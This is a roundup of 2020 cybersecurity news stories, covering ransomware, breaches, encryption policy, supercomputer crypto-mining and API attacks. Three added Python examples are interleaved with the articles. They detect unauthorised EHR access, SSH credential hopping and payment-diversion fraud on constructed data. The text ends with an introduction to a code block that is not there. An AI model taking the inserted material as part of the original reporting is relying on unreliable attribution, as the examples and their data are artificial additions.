Nik Whitfield, CEO, Panaseer, said not knowing the accuracy, timeliness or even limitations of a security metric can render it useless – which is simply unacceptable against a backdrop of tightening regulation and an increasing attack surface.

“We must move on from the era of out-of-date inaccurate metrics to one where they are automated and measured on a continuous basis,” he said. “Financial service organizations, in particular, need trusted and timely metrics into an organization’s technology risk, segmented where possible to critical operations. With this information, the board can then have a better understanding of what risks are and aren't acceptable to keep customer data safe.”

The research determined the primary use for security metrics to be risk management (41%), demonstrating the success of security initiatives (28%), supporting security investment business cases (19%) and board and executive reporting (10%).

The research also found that teams are spending an inordinate amount of time processing metrics, as it can take an average of five days to produce them. Auditors request data most frequently, every 10.4 days on average, while boards need updated metrics almost twice a month or more.

Commenting, Bob Sibik, vice-president of Fusion Risk Management, said that most CEOs “are starved for metrics and want solid metrics as they use them to prepare for how secure they are.” Talking to Infosecurity, Sibik said CEOs like “internal metrics” to show trends and to be able to compare themselves to their peers.

“We rely heavily [on metrics] and metrics are huge for us, and they come in handy and are crucial for day-to-day operations and to define a future strategy,” said Fusion director of cybersecurity, Safi Raza.

Manual processes were also cited as fueling data mistrust. Over half (59%) of security leaders said that they are still relying on spreadsheets to produce metrics and 52% are using custom scripts. Nearly one in five (18%) admitted to relying exclusively on manual processes to develop their security metrics for risk.

FBI Unlocks Pensacola Shooter’s iPhones as Barr Slams Apple

The US attorney general has again attacked Apple for its stance on device encryption even as he revealed that FBI investigators had managed to access a deceased terrorist’s iPhones.

At a press conference to announce updates to the investigation into fatal shootings at Pensacola Naval Air Station, William Barr claimed the “relentless efforts and ingenuity of FBI technicians” had helped reveal more about Mohammed Saeed Alshamrani’s ties to Al Qaeda.

However, he couldn’t resist doubling down on long-standing government criticism of Silicon Valley over encryption.

“Apple made a business and marketing decision to design its phones in such a way that only the user can unlock the contents no matter the circumstances,” Barr argued.

“In cases like this, where the user is a terrorist, or in other cases, where the user is a violent criminal, human trafficker, or child predator, Apple’s decision has dangerous consequences for public safety and national security and is, in my judgment, unacceptable.”

Barr repeated the belief, roundly debunked by the world’s leading encryption experts, that “there is no reason why companies like Apple cannot design their consumer products and apps to allow for court-authorized access by law enforcement while maintaining very high standards of data security.”

In fact, it is widely believed in security circles that if Apple or any tech firm engineered de facto backdoors into their products, the information would eventually end up on the cybercrime underground, undermining security for hundreds of millions of legitimate users.

The Cupertino giant hit back at Barr’s suggestion it had not been any help in the investigation, claiming that it provided iCloud backups, account info and other information on Alshamrani to the FBI.

“The false claims made about our company are an excuse to weaken encryption and other security measures that protect millions of users and our national security,” it continued in a statement.

“It is because we take our responsibility to national security so seriously that we do not believe in the creation of a backdoor — one which will make every device vulnerable to bad actors who threaten our national security and the data security of our customers.”

NHS Trusts Fail Government Cybersecurity Tests

Only one of hundreds of NHS trusts has passed the government-backed Cyber Essentials Plus assessment, according to a concerning new report from the National Audit Office (NAO).

Of the 204 trusts with on-site assessments in place, the average score was 63%, according to a new report from the NAO on digital transformation in the health service.

Although this is up from an estimated 50% in 2017, a pass requires a score of 100%. The scheme tests areas such as vulnerability management, access controls, end-user devices, servers and network security.

“NHSX and NHS Digital consider some trusts have reached an acceptable standard, even though they did not score 100% in the assessment, and note there has been a general improvement in cybersecurity across the NHS,” the NAO explained.

“However, while some attempts have been made to address underlying cybersecurity issues, and progress has been made, it remains an area of concern. A 2019 survey of 186 IT leaders across the sector showed that 61% considered cybersecurity one of their top priorities (sixth highest priority overall).”

The NAO expressed particular concerns over legacy systems in the NHS, although it claimed that since the 2017 WannaCry incident a Windows 10 licensing agreement has been reached which should partly address this. A Data Security Centre was also launched to help prevent, detect and respond to cyber-attacks.

The NAO’s report on the ransomware worm laid the blame on systemic failures at the NHS and Department of Health. Although NHS Digital issued, in March and April 2017, critical alerts to patch the flaws which were ultimately exposed by WannaCry, there was no formal mechanism for checking whether trusts had complied, it found.

Incident response plans were also found not to have been tested at a local level, meaning some trusts couldn’t communicate with national bodies when the ransomware struck.

Around a third of trusts were disrupted due to the cyber-attack, with an estimated 19,000 appointments and operations cancelled. It’s calculated to have cost the NHS £92m, mainly in emergency IT support.

Cloud Exposes SMBs to Attack as Human Error Grows

SMBs are increasingly seeing the same kinds of cyber-attacks as their larger counterparts as cloud and web-based applications help to close the gap between the two, according to Verizon.

The vendor’s annual Data Breach Investigations Report is compiled from an analysis of 32,002 security incidents and 3,950 confirmed breaches.

The report claimed that smaller businesses comprised just over a quarter (28%) of the total number of breaches.

However, more telling was the alignment of top breach-related threats: phishing came top for both SMBs and larger firms, with password dumper malware and stolen credentials featuring in the top four for both.

More than a fifth (20%) of attacks on SMBs were against web applications and involved the use of stolen credentials.

In fact, attacks against cloud-based data were on the up overall with web app threats doubling to 43%. Credential theft, errors and social attacks like phishing accounted for over two-thirds (67%) of breaches.

Preventing human error has also become an increasingly important factor in cybersecurity. This year’s report found that error-related breaches are now more common than malware-driven breaches and almost as common as phishing.

In total, human error accounted for 22% of all breaches, with misdelivery of emails slightly more common than the growing challenge of misconfiguration.

“The fact that misconfiguration is in the top five action varieties for breaches is an important acknowledgment that not all incidents are the result of an exploited vulnerability. Misconfigurations actually lead to more breaches than exploited systems, but organizations often don’t put the same effort into assessing them as they do scanning for vulnerabilities,” argued Tripwire VP of product management, Tim Erlin.

“At a high level, the key things for every organization to worry about are brute forced and stolen credentials, and web applications.”

On the plus side, patching appears to be getting better: just one in 20 breaches exploit vulnerabilities, and 81% were contained within a day or less.

Elsewhere, the insider threat remains pronounced, accounting for 30% of all breaches, while organized crime dominated the external breaches, comprising 55% of the overall total.

“If you want to protect yourself from the most common breaches, protect your web servers, your workstations and your mail infrastructure,” said Erlin.

Chicago Children’s Hospital Sued Over Data Breaches

Lurie Children's Hospital of Chicago is being sued by the parent of a pediatric patient over two recent data breaches. 

An anonymous plaintiff and her 4-year-old daughter filed a complaint against the hospital and two former employees in the Circuit Court of Cook County, Illinois, on May 8. 

Mother and daughter, referred to as Jane Doe and Baby Doe, are seeking class-action status and a trial by jury with the support of law firm Edelson P.C. 

In the suit, the plaintiffs accuse Lurie of breach of contract, breach of confidentiality, and negligent supervision for allegedly failing to keep Baby Doe's medical records safe. 

Jane Doe received a letter on December 24, 2019, informing her that her daughter's records had been accessed by an unnamed nursing assistant without authorization between September 10, 2018, and September 22, 2019.

Baby Doe, then aged 3, had been taken to Lurie for an examination after her mother developed a suspicion that the toddler had become a victim of sexual abuse. 

The suit alleges that Baby Doe's records were accessed as part of a larger data breach in which thousands of patients’ names, addresses, dates of birth, and medical information like diagnoses, medications, appointments, and procedures were accessed without authorization. 

Lurie fired the employee at the center of the cybersecurity incident after the breach was detected. The hospital stated at the time that no evidence had been found to suggest the employee had misused or shared any patient data. 

On Monday, May 4, Jane Doe was notified of a second data breach concerning her daughter's medical records by Lurie. The hospital said that Baby Doe's records were accessed without authorization by another unnamed hospital worker between November 1, 2018, and February 29, 2020.

The plaintiffs allege that Lurie failed to state what action would be taken to ensure the security of the patient’s medical records.

In a statement, Lurie spokesperson Julie Pesch said: “In December 2019 and May 2020, Lurie Children’s notified some of our patients about two nurse assistants who had accessed certain patients’ medical records without an identified patient need. We have no reason to suspect any misuse of patient information associated with this incident. Lurie Children’s addressed this issue in accordance with our disciplinary policies, and the employees no longer work for the Hospital.”
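The pattern in both notifications, a staff member reading records for patients they were never assigned to over many months, is something an EHR audit-log review can surface long before a patient letter goes out. The following is an added example, not Lurie's code or anything from the article: it compares each record access against a care-team roster and flags accesses with no identified patient relationship. The roster, log entries and one-day grace window are all constructed.

```python
"""Flag EHR record accesses that have no identified care relationship.

Added example with constructed data. Assumes an access log of
(timestamp, user, patient, action) and a care-team roster giving the
dates on which a user was assigned to a patient.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed roster: (patient_id, user_id, assignment start, assignment end).
CARE_TEAM = [
    ("P-1001", "rn.alvarez", "2018-09-01", "2018-09-30"),
    ("P-1001", "md.chen",    "2018-09-01", "2019-12-31"),
    ("P-2002", "na.smith",   "2019-01-10", "2019-01-12"),
]

# Constructed access log: (timestamp, user_id, patient_id, action).
ACCESS_LOG = [
    ("2018-09-10T08:15:00", "rn.alvarez", "P-1001", "view"),
    ("2018-09-10T09:40:00", "na.smith",   "P-1001", "view"),  # never assigned
    ("2019-01-11T14:02:00", "na.smith",   "P-2002", "view"),  # assigned that week
    ("2019-03-05T22:10:00", "na.smith",   "P-3003", "view"),  # never assigned
    ("2019-09-22T07:05:00", "na.smith",   "P-1001", "view"),  # never assigned
    ("2019-09-22T07:06:00", "md.chen",    "P-1001", "view"),  # assigned
]

# Assumed grace period: charting the day before or after an assignment is normal.
GRACE = timedelta(days=1)


def build_roster(care_team):
    """Map (patient, user) -> list of [start, end) windows in which access is expected."""
    roster = defaultdict(list)
    for patient, user, start, end in care_team:
        window_start = datetime.fromisoformat(start) - GRACE
        window_end = datetime.fromisoformat(end) + timedelta(days=1) + GRACE
        roster[(patient, user)].append((window_start, window_end))
    return roster


def has_relationship(roster, patient, user, when):
    return any(start <= when < end for start, end in roster.get((patient, user), ()))


def find_unexplained_access(access_log, care_team):
    """Return every access for which the user had no assignment covering that time."""
    roster = build_roster(care_team)
    hits = []
    for ts, user, patient, action in access_log:
        if not has_relationship(roster, patient, user, datetime.fromisoformat(ts)):
            hits.append({"ts": ts, "user": user, "patient": patient, "action": action})
    return hits


def summarize_by_user(hits):
    """Per user: how many distinct patients, and over how many calendar days.
    A long span across several patients is the pattern worth escalating."""
    times = defaultdict(list)
    patients = defaultdict(set)
    for hit in hits:
        times[hit["user"]].append(datetime.fromisoformat(hit["ts"]).date())
        patients[hit["user"]].add(hit["patient"])
    summary = {}
    for user, dates in times.items():
        dates.sort()
        summary[user] = {
            "patients": len(patients[user]),
            "first": dates[0].isoformat(),
            "last": dates[-1].isoformat(),
            "days": (dates[-1] - dates[0]).days,
        }
    return summary


if __name__ == "__main__":
    found = find_unexplained_access(ACCESS_LOG, CARE_TEAM)
    for hit in found:
        print("UNEXPLAINED", hit)
    print(summarize_by_user(found))
```

On the constructed data the only unexplained accesses belong to one account, touching two patients across 377 days, which is the shape of the incident described above. In practice the roster comes from encounter, scheduling and unit-assignment data, and legitimate exceptions (break-the-glass, coding, quality review) need their own documented justification rather than a blanket exemption.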

Texas Takes Second Ransomware Hit

The Texas Department of Transportation (TxDOT) has been hit by ransomware just days after the state's judiciary system suffered the same fate. 

According to a May 15 message posted on Twitter by TxDOT, the attack struck on May 14, when a threat actor gained unauthorized access to the department's computer network.

The network was shut down as soon as the attack was detected in an effort to contain the threat and prevent any further unauthorized access. 

TxDOT executive director James Bass said in the statement: "We want every Texan to rest assured that we are doing everything we can to swiftly address this issue. We also are working to ensure critical operations continue during this interruption."

Federal law enforcement was informed of the attack, and TxDOT said that no mercy will be shown to whoever is found to be responsible for it.

Bass said: "TxDOT is working closely with the FBI to find the individual(s) responsible and prosecute them to the fullest extent of the law."

TxDOT oversees all air, road, and railway transportation in the state. At time of publication, the department's website was back up and running. 

News of the TxDOT attack comes days after a ransomware attack hit the state's judicial agencies and appellate courts on May 8. As a result of the incident, access to case management systems was lost and court offices were unable to connect to the internet.

With the usual channels disabled by cyber-criminals, staff were reduced to using social media to announce legal rulings. 

The first attack was identified by the Office of Court Administration (OCA). No information as to whether the two attacks were linked in any way has been forthcoming. 

Neither the OCA nor TxDOT shared any information regarding what, if any, data had been encrypted or stolen. Similarly, neither ransomware target has disclosed any details of a ransom demand.

Texas is fast becoming a hotspot for cyber-attacks. In 2019, ransomware was used to target 22 local governments across the Lone Star State in a single attack. The collective ransom demand for the coordinated assault was $2.5m.

Cyber Insurers Increase Scrutiny Amid Pandemic

Heightened cybersecurity risks triggered by the outbreak of COVID-19 are causing insurers to grill policyholders more closely.

According to the Wall Street Journal, insurers have increased their scrutiny of policyholders' security arrangements as the rise in remote working drives up risk. 

Stephen Viña, a senior vice president in Marsh & McLennan Co.’s cyber insurance brokering business, told the WSJ that insurers want more details than ever before. 

Describing the surveys insurers ask companies to complete so that their risk can be assessed and their premiums calculated, Viña said: "There are a lot more questions being asked."

Companies are now expected to supply more details than before regarding how they would respond to a data breach and what action they would take if hit by ransomware or any other form of cyber-attack.

Depending on how the companies answer the survey, they could end up with a costlier policy or in some cases be denied coverage. 

Viña said insurers are deeply concerned that working conditions during the pandemic will expose companies to additional risks that simply weren't considered when their insurance policy was being created. 

For example, companies that had tight control over the security of employees working in a central office could face increased and unplanned-for risks as workers toil remotely to comply with lockdown measures, relying on home networks and personal equipment. 

Chief innovation officer at London-based insurer CFC Underwriting Ltd. Graeme Newman said policyholders were being asked to show insurers that remote-working situations had been taken into account in their business continuity plans.

Cyber-insurance claims have increased as data breaches and ransomware attacks continue to blight every industry. According to data from regulatory filings compiled by Fitch Ratings, direct loss ratios for stand-alone cyber-insurance policies rose to 47% in 2019 from 34% in 2018. Direct loss ratios measure the percentage of income paid to claimants by insurance companies.

Fitch managing director Jim Auden said that although the data is incomplete because it doesn't contain certain elements, including reimbursements insurers received from their own insurers, it is a good indicator of overall trends. 

He said: “We think that with more risk being covered, and maybe newer underwriters getting into the business that don’t have that pricing expertise, that’ll lead to more losses over time."

Responsible Cyber Announces Identity Acquisition and New Shareholders

Singaporean startup Responsible Cyber has announced the acquisition of fellow startup Secucial and new shareholders.

The Secucial acquisition adds a mobile digital identity wallet to its portfolio: a decentralized identity system built around a mobile app that provides authentication with biometrics and contextual multi-factor authentication, and lets users exchange ID documents with a third party.

Responsible Cyber is part of the ICE71 Scale program, a landing pad that helps international and local cybersecurity startups seize opportunities and grow their businesses in Singapore and within Asia Pacific.

As a result of the acquisition, Responsible Cyber has also added NUS Enterprise, the entrepreneurial arm of the National University of Singapore, and Singtel Innov8, the venture capital arm of the Singtel Group, as new shareholders. NUS Enterprise and Singtel Innov8 are the co-founders of ICE71, the region’s first cybersecurity entrepreneur hub.

Secucial was part of the first cohort to graduate from ICE71 Accelerate, a three-month accelerator program designed to help early-stage cybersecurity startups achieve a product market fit in a unique technical and demanding industry. 

“We welcome NUS Enterprise and Singtel Innov8 as our shareholders, especially during uncertain times like these,” said Magda Chelly, founder and managing director, Responsible Cyber.

“Our platform addresses the needs of business owners who do not have the right means and technical knowledge to implement cybersecurity measures for their businesses. By providing a user-friendly cybersecurity solution, we help small and medium businesses to continue operating remotely, reliably and securely, especially during this COVID-19 pandemic.”

Crypto-Miners Take Out Supercomputers Working on #COVID19

Supercomputers across Europe appear to have been targeted by cryptocurrency miners over the past few days, forcing offline key IT resources working on COVID-19 research.

One of the first to report problems was the University of Edinburgh’s Archer supercomputer, which was taken offline last Monday after “a security exploitation on the Archer login nodes.”

Working with the National Cyber Security Centre (NCSC), the institution has been forced to reset all existing passwords and SSH keys. The system is still down at the time of writing.

The Computer Security Incident Response Team (CSIRT) at the European Grid Infrastructure (EGI) organization revealed two potentially related security incidents in an analysis on Friday. In both, a malicious actor was blamed for targeting academic data centers for CPU mining.

“The attacker is hopping from one victim to another using compromised SSH credentials,” it explained.

The attackers were logging in from three compromised networks, at the University of Krakow in Poland, Shanghai Jiaotong University and the China Science and Technology Network. It has been claimed that some credentials are shared between academic institutions, making it easier for would-be attackers.

It’s also claimed that the attackers are exploiting CVE-2019-15666 for privilege escalation before deploying a Monero cryptocurrency miner.

Other institutions affected by the campaign include the Swiss Center of Scientific Computations (CSCS), the bwHPC, which runs supercomputers across the German region of Baden-Württemberg, the University of Stuttgart’s HPE Hawk machine, the Leibniz Computing Center (LRZ) and an unnamed facility in Barcelona.

“What’s interesting about this is that it seems hackers have targeted the supercomputers completely remotely for the first time, as before there has always been an insider who installs the crypto-mining malware used for the attack,” argued ESET cybersecurity specialist, Jake Moore.

“All the SSH login credentials will now need resetting, which may take a while, but this is vital to stop further attacks. Once a list of credentials is compromised, it is a race against time to have these reset. Unfortunately, the lead time is usually enough of a head start for threat actors to take advantage of the mining software.”
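Credential hopping of the kind EGI CSIRT describes leaves a distinctive trace in sshd logs: one account's key accepted from several unrelated networks within hours. The following is an added example, not from the article, EGI or any of the affected sites; it parses syslog-style sshd lines, separates off-campus logins from expected ones, and flags accounts whose sessions come from too many distinct sources in one window. The log lines, the campus allowlist (RFC 5737 documentation addresses) and the assumed year are all constructed.

```python
"""Spot SSH credential hopping in sshd logs.

Added example, not from the article or EGI CSIRT. Assumes syslog-style sshd
lines and a constructed allowlist of networks from which interactive logins
to the login nodes are expected; the year is assumed because syslog omits it.
"""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

ACCEPTED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d+\s\d\d:\d\d:\d\d)\s(?P<host>\S+)\ssshd\[\d+\]:\s"
    r"Accepted\s(?P<method>\w+)\sfor\s(?P<user>\S+)\sfrom\s(?P<ip>\d+\.\d+\.\d+\.\d+)"
)
ASSUMED_YEAR = 2020  # syslog timestamps carry no year

# Constructed: campus ranges whose logins are expected on the login nodes.
CAMPUS_NETS = [ipaddress.ip_network("192.0.2.0/24")]

# Constructed sample lines (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
May 11 09:12:01 login1 sshd[2211]: Accepted publickey for alice from 192.0.2.15 port 50122 ssh2
May 11 09:14:37 login1 sshd[2298]: Accepted publickey for alice from 203.0.113.7 port 41012 ssh2
May 11 09:20:02 login2 sshd[1190]: Accepted publickey for alice from 198.51.100.23 port 60334 ssh2
May 11 09:21:45 login1 sshd[2301]: Failed password for root from 203.0.113.7 port 41019 ssh2
May 11 10:03:11 login1 sshd[2400]: Accepted password for bob from 192.0.2.77 port 50200 ssh2
May 12 02:30:00 login2 sshd[1301]: Accepted publickey for alice from 203.0.113.99 port 43210 ssh2
"""


def parse_accepted(text):
    """Return successful logins as dicts with a real datetime and an ip_address."""
    events = []
    for line in text.splitlines():
        m = ACCEPTED_RE.match(line)
        if not m:
            continue  # failures and other sshd chatter are ignored here
        when = datetime.strptime(f"{ASSUMED_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"when": when, "host": m["host"], "method": m["method"],
                       "user": m["user"], "ip": ipaddress.ip_address(m["ip"])})
    return events


def off_campus(events, nets=CAMPUS_NETS):
    """Logins from outside the expected networks; each one needs an explanation."""
    return [e for e in events if not any(e["ip"] in n for n in nets)]


def hopping_accounts(events, window=timedelta(hours=24), min_sources=3):
    """Accounts that logged in from >= min_sources distinct IPs inside one window.
    One key used from several unrelated networks in a day is the hopping signature."""
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)
    flagged = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["when"])
        for i, first in enumerate(evs):
            sources = {e["ip"] for e in evs[i:] if e["when"] - first["when"] <= window}
            if len(sources) >= min_sources:
                flagged[user] = sorted(sources)
                break
    return flagged


if __name__ == "__main__":
    found = parse_accepted(SAMPLE_LOG)
    for e in off_campus(found):
        print("OFF-CAMPUS", e["when"], e["user"], e["ip"], e["host"])
    for user, ips in hopping_accounts(found).items():
        print("HOPPING", user, [str(ip) for ip in ips])
```

Running this across every login node, rather than one host at a time, is what makes the cross-site pattern visible; the flagged accounts are also the ones whose keys to revoke first when, as Moore notes, the full reset takes a while.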

Police Catch Suspects Planning #COVID19 Hospital Ransomware

Police in Europe have swooped on a cybercrime gang they suspect of planning ransomware attacks using COVID-19 lures against hospitals.

The four-man “Pentaguard” group was formed at the start of the year, according to the Romanian Directorate for Investigating Organized Crime and Terrorism (DIICOT).

It amassed tools including ransomware, remote access trojans (RATs), and SQL injection tools to launch attacks against public and private sector organizations with the aim of stealing data, defacing websites and encrypting key systems.

“They intended to launch ransomware attacks, in the near future, on some public health institutions in Romania, generally hospitals, using social engineering by sending a malicious executable application, from the Locky or BadRabbit families, hidden in an e-mail and in the form of a file that apparently would come from other government institutions, regarding the threat of COVID-19,” the DIICOT update explained.

“Through this type of attack, there is the possibility of blocking and seriously disrupting the functioning of the IT infrastructures of those hospitals, part of the health system, which plays a decisive role at this time, to combat the pandemic with the new coronavirus.”

Officers carried out three house searches in Romania and one in neighboring Moldova.

Hospitals around the world have been under constant attack over the past few weeks as ransomware gangs try to take advantage of the current pandemic to put pressure on their victims to pay.

Microsoft warned recently that many of these attacks used APT-style techniques: exploitation of a VPN or remote access vulnerability, followed by reconnaissance, privilege escalation and lateral movement.

In April, INTERPOL was forced to issue a Purple Notice to all of its 194 member countries about the cyber-threat to hospitals and other front-line organizations.

REvil Ransomware Gang Threatens to Release Dirt on Trump

Ransomware attackers that stole data from a New York law firm on its celebrity clients have doubled their demand and threatened to release sensitive information on US President Donald Trump.

The REvil group claimed to have lifted 756GB of data from Grubman Shire Meiselas & Sack, which counts the likes of Madonna, Bruce Springsteen, Run DMC and Mariah Carey among its clients.

The media and entertainment law firm confirmed last week that it had been a victim of a cyber-attack and that it was “working around the clock to address these matters.”

However, the ransomware group’s original deadline for payment of $21m ran out at the end of last week, and it has now upped the demand to $42m.

To show they mean business, the cyber-criminals recently released over 2GB of stolen documents related to contract dealings of Lady Gaga.

They also threatened to publish dirt on Donald Trump, although reports suggest he was never a client of the law firm.

“There's an election race going on, and we found a ton of dirty laundry on time. Mr Trump, if you want to stay President, poke a sharp stick at the guys, otherwise you may forget this ambition forever,” they claimed on a dark web site.

“To you voters, we can let you know that after such a publication, you certainly don't want to see him as President. Well, let's leave out the details. The deadline is one week.”

Recorded Future’s senior solutions architect, Allan Liska, pointed to the threats as just the latest in a long line of incidents where ransomware groups publish data stolen from their victims in a bid to force payment.

“Ransomware groups have grown increasingly bold in their targets and their ransom demands and so far have been able to operate with very little pushback,” he added.

“In addition, it has long been suspected that this group operates within Russia's locus of control. The Kremlin generally turns a blind eye to these activities, as long as the threat actors don't target Russian citizens. However, going after an ally of Russia may force Russian cybersecurity forces to turn their attention to the REvil team as well.”

Trump has consistently refused to comply with demands from federal prosecutors to release information on his financial affairs. Separate investigations are looking at whether he committed tax fraud and if his business dealings left him subject to the influence of foreign individuals or governments.

Iowa Civil Rights Meeting Zoom-bombed

A Des Moines civil rights meeting was abandoned yesterday after being digitally crashed twice by racist cretins.

The joint meeting between the city's Civil and Human Rights Commission and Des Moines City Council was being held virtually using the videoconferencing app Zoom due to lockdown measures intended to decelerate the spread of COVID-19.

Before the meeting was called to order, an unknown person gained access to the online gathering to aim offensive comments at the commission. The attacker singled out two specific members of the commission, leveling several ignorant, racist slurs and trotting out the n-word.

As the meeting opened, Joshua Barr, Des Moines's civil and human rights director, told the council that he and other members of the commission had been "zoom-bombed."

“There were some racial slurs and things that were posted. I’ll just be candid with it," Barr told the virtual meeting attendants. "If that does happen again, we will have to end the meeting for the protection of the public."

After Barr's acknowledgement, an attempt was made to continue with the meeting. But moments later, as Mayor Frank Cownie delivered his opening remarks, a Zoom-bomber interrupted proceedings with more repellant rubbish.

To spare the attendees from any more offensive idiocy, the meeting was then cancelled. 

Cownie described the actions of the zoom-bomber as a "disgusting and sickening display of racial intolerance" that would only strengthen the city's resolve to educate those unfortunate people who in 2020 are somehow still mired in a ridiculous historical hatred.

Commission chair Kameron Middlebrooks said the sorry incident underlined the need for the community to come together in a spirit of love, equality, and positivity. 

"What occurred proves hate and ignorance is alive and well. But I stand steadfast in my resolve to continue to be an agent of change," said Middlebrooks. "Our commission has started the path to bridging the gap we face in our community and will continue to work cooperatively with council and Des Moines residents to ensure we drive this hate into the darkness and uplift neighbors with love and equitable policies."   

The City of Des Moines is currently operating under a Proclamation of Emergency issued on March 5, 2020, in response to the COVID-19 pandemic.

Norway’s Wealth Fund Loses $10m in Data Breach

Norway's state-owned investment fund Norfund has halted all payments after losing $10m in an "advanced data breach."

Norfund is a private equity company established by the Norwegian parliament, the Storting, in 1997 and owned by the Norwegian Ministry of Foreign Affairs. The fund receives its investment capital from the state budget.

On May 13, Norfund announced that it was "cooperating closely with the police and other relevant authorities" after "a series of events" allowed fraudsters to make off with $10m. 

The fund said that a data breach allowed defrauders to access information concerning a loan of US$10m from Norfund to a microfinance institution in Cambodia. 

Using a mixture of manipulated data and falsified information, the fraudsters managed to impersonate the borrowing institution and divert funds away from the genuine recipient and into their own pockets. 

"The defrauders manipulated and falsified information exchange between Norfund and the borrowing institution over time in a way that was realistic in structure, content and use of language. Documents and payment details were falsified," said a Norfund spokesperson.

Funds were diverted to an account in Mexico under the same name as the Cambodian microfinance institution. The theft took place on March 16 but went undetected until April 30, when the scammers attempted to fraudulently obtain more money. 

“This is a very unfortunate situation," said Olaug Svara, chair of the board of directors. "We now have to get a full overview of the chain of events in order to get to the bottom of this."

Norfund's board has engaged PwC to undertake a full review of the company's security systems and routines.

Norfund CEO Tellef Thorleifsson said: "The fact that this has happened shows that our systems and routines are not good enough. We have taken immediate and serious action to correct this.”

Commenting on how the fraud might have been committed, Chris Hazelton, director of security solutions at Lookout, said: “There is no specific information on how this attack took place, nevertheless, how the threat actors were able to 'manipulate the communication between Norfund and the intended recipient' points to either BEC or phishing as a likely entry point for attackers."
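The detail that matters for defenders is that the diverted payment went to an account "under the same name" as the genuine borrower: a control that matches only the beneficiary name passes the fraudulent instruction. The following is an added example, not Norfund's process or code from the article; it checks a payment instruction against a vetted beneficiary record on account, bank country and sender domain as well as name, and reports every mismatch as a reason for out-of-band confirmation. The master record, both instructions and the counterparty identifiers are constructed.

```python
"""Pre-release checks for a wire against a vetted beneficiary record.

Added example, not Norfund's process or code. Assumes each counterparty has a
master record captured at onboarding and that the payment instruction's fields
were extracted from the incoming correspondence; all data is constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Beneficiary:
    name: str
    bank_country: str    # ISO 3166-1 alpha-2 of the receiving bank
    account: str
    contact_domain: str  # domain the counterparty normally writes from


# Constructed master record for a hypothetical Cambodian microfinance borrower.
MASTER = {
    "MFI-KH-0042": Beneficiary("Example Microfinance Plc", "KH",
                               "0001234567", "example-mfi.com.kh"),
}

# Constructed instructions: the genuine one and a fraudulent one that keeps the
# beneficiary name but swaps in a Mexican account and a lookalike sender domain.
GENUINE = {"beneficiary_name": "Example Microfinance Plc", "account": "0001234567",
           "bank_country": "KH", "sender_email": "finance@example-mfi.com.kh"}
FRAUD = {"beneficiary_name": "EXAMPLE MICROFINANCE PLC", "account": "012345678901234567",
         "bank_country": "MX", "sender_email": "finance@examp1e-mfi.com.kh"}


def _normalize_name(name):
    return re.sub(r"[^a-z0-9]", "", name.lower())


def _edit_distance(a, b):
    """Levenshtein distance, used to tell a typosquat from an unrelated domain."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def verify_instruction(counterparty_id, instruction, master=MASTER):
    """Return the reasons this instruction needs out-of-band confirmation
    (a call to a number already on file, never one taken from the email).
    An empty list means every checked field matches the vetted record."""
    ref = master[counterparty_id]
    flags = []
    if _normalize_name(instruction["beneficiary_name"]) != _normalize_name(ref.name):
        flags.append("beneficiary name differs from master record")
    if instruction["account"] != ref.account:
        flags.append("account number differs from master record")
    if instruction["bank_country"] != ref.bank_country:
        flags.append(f"bank country {instruction['bank_country']} differs from {ref.bank_country}")
    sender_domain = instruction["sender_email"].rsplit("@", 1)[-1].lower()
    if sender_domain != ref.contact_domain:
        close = _edit_distance(sender_domain, ref.contact_domain) <= 2
        kind = "a lookalike of" if close else "unrelated to"
        flags.append(f"sender domain {sender_domain} is {kind} {ref.contact_domain}")
    return flags


if __name__ == "__main__":
    for label, instruction in (("genuine", GENUINE), ("fraud", FRAUD)):
        print(label, verify_instruction("MFI-KH-0042", instruction) or ["ok"])
```

The fraudulent instruction raises three flags and none of them is the name, which is the point: any change to account, bank country or sender domain must block release until confirmed over a channel the attacker does not control, and the master record itself must only be changed through the same process.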

API Attacks Increase During Lockdown

Cyber-attacks against API endpoints have increased since lockdown measures were introduced to slow the spread of COVID-19.

Threat research published today by California cybersecurity software company Cequence noted a huge spike in malicious traffic since April, with API endpoints being targeted far more than usual. 

Describing the number of threats leveled at just one of its customers, Cequence researchers saw malicious traffic increase by 40% to 28 million events over the week commencing April 17. As time marched on, the volume of attacks rose.

"Week of April 23rd saw a massive spike of 279% to 78M with one attack campaign peaking at 100,000 requests per minute," noted researchers. "Week of May 1st showed yet another increase in malicious traffic to 139M requests or an 85% week over week increase."

Attackers were found to be directing the lion's share of traffic at one login API endpoint for the Android application. 

Asked why this particular API received a battering, CQ Threat Research team member and hacker in residence Jason Kent told Infosecurity Magazine: "Usually this is because an attack worked once against that endpoint. Often the focus API endpoint is old, learned either several months ago, or the attacker assumes the older endpoints are forgotten (often the case) and not monitored. 

"Additionally, it is much easier to decompose the API calls an application makes from Android because there are several tools to help with this, versus iOS, which is a bit more difficult."

According to Kent, the biggest trend observed in attacks instigated since "stay safe" became a standard email sign-off has been a growth in overall volume. He added that attackers have significantly stepped up their tactics around volume, source IPs and User-Agents (device type).

"Attackers are obviously focused on account takeover and are clearly trying to get past mitigation efforts: traffic is being distributed across approximately 1 million residential IP addresses from 15,000 different organizations owned by Bulletproof Proxy vendors, and they are rotating 3 million user agents," said Kent. 

"The heavy use of residential IP addresses, combined with Covid-19 driven stay-at-home orders, makes separating out malicious traffic from legitimate traffic even more important.  The attackers know if they can use residential IP addresses from Bulletproof Proxy Networks, they’ll be that much harder to catch and defend against."
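Spreading a campaign over a million residential IPs and three million User-Agents defeats the usual per-source rate limit, because no single IP or UA ever crosses a threshold. What still stands out is the population-level shape of the traffic. The following is an added example, not Cequence's code; it builds constructed login traffic for a normal user base and for a rotating campaign of the kind Kent describes, then shows that a per-IP counter sees nothing while window-level statistics (attempts, distinct IPs and accounts per attempt, failure rate) separate the two. Thresholds are assumptions to be tuned per endpoint.

```python
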